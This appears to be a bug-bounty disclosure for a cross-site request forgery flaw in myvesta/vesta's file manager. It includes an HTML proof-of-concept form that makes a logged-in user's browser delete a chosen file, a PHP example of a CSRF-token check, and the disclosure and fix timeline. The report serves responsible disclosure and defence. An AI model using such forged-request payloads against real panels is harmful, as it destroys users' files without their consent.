Cross-Site Request Forgery (CSRF) in myvesta/vesta


Reported on

Aug 24th 2021

✍️ Description

An attacker can delete any file on the server if a logged-in user visits the attacker's website.

🕵️‍♂️ Proof of Concept

Create a test.txt file under /home/user. While logged in, open this POC.html in a browser and check that test.txt is deleted.

<script>history.pushState('', '', '/')</script>
<!-- Hidden fields carry the file-manager parameters; the entity-encoded values decode to the plain path and action -->
<form action="">
<input type="hidden" name="item" value="&#47;home&#47;user&#47;test&#46;txt" />
<input type="hidden" name="dir" value="&#47;home&#47;user" />
<input type="hidden" name="action" value="delete&#95;files" />
<input type="submit" value="Submit request" />
</form>

💥 Impact

This vulnerability lets an attacker forge a request on behalf of an admin or user and delete any file that user has access to.
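The standard fix is to bind every state-changing file-manager request to a per-session token that a cross-site form cannot know. The following is an added example written for this report, not myvesta/vesta code: the function names, the array-based session handling and the host names are assumptions, and the request dispatch is simplified to the delete_files action seen in the PoC.

```php
<?php
// Added example, not myvesta/vesta code: a synchronizer-token CSRF check in front
// of a file-manager action handler. Sessions are plain arrays so this runs from the CLI.

function csrf_issue_token(array &$session): string {
    // One random token per login session; embed it in the file manager's own forms.
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function csrf_request_is_valid(array $session, array $post, array $server): bool {
    // State-changing actions must arrive via POST, never via GET links.
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    // The submitted token must match the session copy (constant-time compare).
    $expected = $session['csrf_token'] ?? '';
    if ($expected === '' || !hash_equals($expected, (string)($post['csrf_token'] ?? ''))) {
        return false;
    }
    // Defence in depth: when the browser sends Origin, it must be our own host.
    if (isset($server['HTTP_ORIGIN'])
        && parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST) !== ($server['HTTP_HOST'] ?? null)) {
        return false;
    }
    return true;
}

function fm_handle(array $session, array $post, array $server): string {
    if (!csrf_request_is_valid($session, $post, $server)) {
        return 'rejected: missing or invalid CSRF token';   // nothing is deleted
    }
    if (($post['action'] ?? '') === 'delete_files') {
        // Real code would also confine $post['item'] to the user's home directory.
        return 'would delete ' . $post['item'];
    }
    return 'rejected: unknown action';
}

// Constructed requests (not from the report): a cross-site POST with no token is
// refused; the same parameters sent from the panel's own form with the token pass.
$session = [];
$token   = csrf_issue_token($session);
$forged  = ['action' => 'delete_files', 'item' => '/home/user/test.txt', 'dir' => '/home/user'];
$server  = ['REQUEST_METHOD' => 'POST', 'HTTP_HOST' => 'panel.example', 'HTTP_ORIGIN' => 'https://attacker.example'];
echo fm_handle($session, $forged, $server), "\n";
$server['HTTP_ORIGIN'] = 'https://panel.example';
echo fm_handle($session, $forged + ['csrf_token' => $token], $server), "\n";
```

Setting the session cookie with SameSite=Lax or Strict is a complementary mitigation, but the token check is what stops the forged submission regardless of browser behaviour.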

💥 Test

Tested on Edge, Firefox, Chrome and Safari.

📍 Location

fm_api.php#L1

📝 References

csrf

We have contacted a member of the myvesta/vesta team and are waiting to hear back (a year ago)
Musio modified the report (a year ago)
myvesta validated this vulnerability (a year ago)
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
myvesta confirmed that a fix has been merged on 93de22 (a year ago)
myvesta has been awarded the fix bounty
